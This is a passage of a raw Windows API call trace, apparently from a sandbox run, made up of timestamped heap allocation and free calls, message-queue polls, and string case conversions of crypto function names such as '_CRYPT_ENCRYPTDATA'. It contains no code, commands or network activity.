HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.809] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0075.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12292) returned 0x440b3b8 [0075.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.810] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0075.810] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0075.810] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12292) returned 0x440b3b8 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0075.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0075.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0075.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0075.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0075.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12292) returned 0x442f8f8 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0075.813] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0075.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0075.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0075.813] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0075.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0075.814] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0075.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0075.814] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0075.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.815] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0075.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.815] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0075.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0075.816] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0075.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0075.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0075.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0075.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0075.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.818] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0075.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: 